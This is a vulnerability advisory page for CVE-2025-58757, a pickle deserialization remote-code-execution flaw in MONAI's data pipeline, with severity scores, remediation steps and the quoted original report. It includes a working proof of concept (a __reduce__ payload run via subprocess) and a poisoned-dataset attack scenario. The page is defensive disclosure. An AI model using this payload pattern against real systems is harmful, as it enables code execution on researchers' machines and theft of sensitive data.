CVE-2025-58757: MONAI: unsafe pickle deserialization RCE in data pipeline

GHSA-p8cm-mm2v-gwjm HIGH PoC AVAILABLE CISA: ATTEND
Published September 9, 2025
CISO Take

Any MONAI-based medical AI pipeline loading datasets from external or shared sources is vulnerable to arbitrary code execution — no special permissions required from the attacker. Upgrade to MONAI 1.5.1 immediately and audit all data ingestion workflows. The medical research context (dataset sharing via Zenodo, GitHub, institutional repos) makes social engineering delivery trivially viable.

What is the risk?

Effective risk is HIGH despite moderate EPSS. The vulnerability is trivially exploitable (working PoC published, no AI/ML expertise required), the attack surface is broad (any DataLoader using list_data_collate with external data), and the target audience — medical AI researchers — skews toward lower security awareness. The 6k+ GitHub stars indicate significant real-world deployment. While not yet KEV-listed, the published PoC accelerates exploitation timeline significantly.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
MONAI pip <= 1.5.0 1.5.1
8.3K OpenSSF 6.7 110 dependents Pushed 8d ago 100% patched ~15d to patch Full package profile →

Do you use MONAI? You're affected.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 44% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Unchanged
C High
I High
A High

What should I do?

6 steps
  1. PATCH

    Upgrade to MONAI >= 1.5.1 immediately (patches available in PR #8566, commit 948fbb7).

  2. AUDIT

    Inventory all deployments using monai.data.list_data_collate or monai.data.utils.pickle_operations with externally sourced data.

  3. HARDEN

    Enforce strict data provenance — only load datasets from cryptographically verified, internal sources until patched.

  4. SANDBOX

    Run data preprocessing in isolated containers/VMs without network access or credential exposure as compensating control.

  5. DETECT

    Scan incoming datasets for pickle magic bytes (\x80\x04\x95) in non-model fields before loading.

  6. FEDERATED LEARNING

    Treat this as critical if you accept data contributions from external partners — any contributed batch can now execute code on your training infrastructure.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.7.3 - Data for AI systems
NIST AI RMF
GOVERN 6.1 - Supply Chain Risk Management
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58757?

Any MONAI-based medical AI pipeline loading datasets from external or shared sources is vulnerable to arbitrary code execution — no special permissions required from the attacker. Upgrade to MONAI 1.5.1 immediately and audit all data ingestion workflows. The medical research context (dataset sharing via Zenodo, GitHub, institutional repos) makes social engineering delivery trivially viable.

Is CVE-2025-58757 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58757, increasing the risk of exploitation.

How to fix CVE-2025-58757?

1. PATCH: Upgrade to MONAI >= 1.5.1 immediately (patches available in PR #8566, commit 948fbb7). 2. AUDIT: Inventory all deployments using monai.data.list_data_collate or monai.data.utils.pickle_operations with externally sourced data. 3. HARDEN: Enforce strict data provenance — only load datasets from cryptographically verified, internal sources until patched. 4. SANDBOX: Run data preprocessing in isolated containers/VMs without network access or credential exposure as compensating control. 5. DETECT: Scan incoming datasets for pickle magic bytes (\x80\x04\x95) in non-model fields before loading. 6. FEDERATED LEARNING: Treat this as critical if you accept data contributions from external partners — any contributed batch can now execute code on your training infrastructure.

What systems are affected by CVE-2025-58757?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, federated learning.

What is the CVSS score for CVE-2025-58757?

CVE-2025-58757 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.60%.

What is the AI security impact?

Affected AI Architectures

training pipelinesdata preprocessing pipelinesfederated learning

MITRE ATLAS Techniques

AML.T0010.002 Data
AML.T0011 User Execution
AML.T0011.000 Unsafe AI Artifacts
AML.T0019 Publish Poisoned Datasets
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.7.3
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

>To prevent this report from being deemed inapplicable or out of scope, due to the project's unique nature (for medical applications) and widespread popularity (6k+ stars), it's important to pay attention to some of the project's inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.) ### Summary The ```pickle_operations``` function in ```monai/data/utils.py``` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures. When verified using the following proof-of-concept, arbitrary code execution can occur. ``` #Poc from monai.data.utils import pickle_operations import pickle import subprocess class MaliciousPayload: def __reduce__(self): return (subprocess.call, (['touch', '/tmp/hacker1.txt'],)) malicious_data = pickle.dumps(MaliciousPayload()) attack_data = { 'image': 'normal_image_data', 'label_transforms': malicious_data, 'metadata_transforms': malicious_data } result = pickle_operations(attack_data, is_encode=False) ``` ``` #My /tmp directory contents before running the POC root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp autodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid ``` Before running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful. ``` #Running Poc root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp autodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp autodl.sh.log hacker1.txt selenium-managersXRcjF supervisor.sock supervisord.pid ``` The above proof-of-concept is merely a validation of the vulnerability. The attacker creates malicious dataset content. ``` malicious_data = { 'image': normal_image_tensor, 'label': normal_label_tensor, 'preprocessing_transforms': pickle.dumps(MaliciousPayload()), # Malicious payload 'augmentation_transforms': pickle.dumps(MaliciousPayload()) # Multiple attack points } dataset = [malicious_data, ...] ``` When a user batch-processes data using MONAI's list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations. ``` from monai.data import list_data_collate dataloader = DataLoader( dataset, batch_size=4, collate_fn=list_data_collate # Trigger the vulnerability ) # Automatically execute malicious code while traversing the data for batch in dataloader: # Malicious code is executed in pickle_operations pass ``` When a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered. ### Impact Arbitrary code execution ### Repair suggestions Verify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface's transformer library.

Exploitation Scenario

Attacker publishes a convincing medical imaging dataset (chest X-ray, MRI segmentation) to a public repository such as Zenodo, HuggingFace Datasets, or a GitHub release. The dataset JSON/HDF5 metadata embeds pickle payloads in dictionary keys suffixed with '_transforms' (e.g., 'preprocessing_transforms', 'augmentation_transforms'). A medical AI researcher clones the repo and runs a standard MONAI training script — the moment the DataLoader iterates the first batch, list_data_collate triggers pickle_operations, executing the payload. Attacker achieves persistent access to the researcher's workstation or GPU cluster, potentially exfiltrating trained models, patient data, institutional credentials, or pivoting to connected hospital systems.

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
September 9, 2025
Last Modified
September 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities